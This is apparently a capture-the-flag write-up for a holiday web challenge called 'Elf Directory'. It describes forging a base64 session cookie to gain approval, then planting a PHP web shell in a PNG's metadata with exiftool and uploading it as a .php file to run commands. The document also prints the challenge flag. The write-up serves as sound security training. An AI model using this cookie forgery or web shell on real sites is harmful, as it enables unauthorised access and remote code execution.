Skip to main content

Day 4: Elf Directory

challenge description
Can you infiltrate the Elf Directory to get a foothold inside Santa's data warehouse in the North Pole?

Enumeration

No source code this time. Let's poke at the application!

We are presented with a way to register and login. Upon login, we are informed that only authorised personnel can edit their profile... So sad.

Dashboard

Contact the admin elf? Ain't my username admin already? There must be a way the application is checking the status.

Cookies

It seems like to maintain state, it uses PHP Session Cookies. It looks decodeable. Let's decode it on CyberChef.

Decode

Hmm.. What if I change the value of approved to true and replace the cookie to eyJ1c2VybmFtZSI6ImFkbWluIiwiYXBwcm92ZWQiOnRydWV9?

Upload

New upload functionality! Poking around, it strictly only allows PNG. No filename tricks here...

However, it does accept a filename of <name>.php though... Let's put the PHP script inside an actual image within the image metadata as a comment.

exiftool -Comment="<?php if(isset(\$_REQUEST['cmd'])){ echo \"<pre>\"; \$cmd = (\$_REQUEST['cmd']); system(\$cmd); echo \"</pre>\"; die; }?>" test.png

Next, before sending the image, we modify the filename in either Burp Suite or Firefox DevTools.

Now, we can browse to the image!

Injection

Viola. Now we just have to find the flag.

Flag

Flag

HTB{br4k3_au7hs_g3t_5h3lls}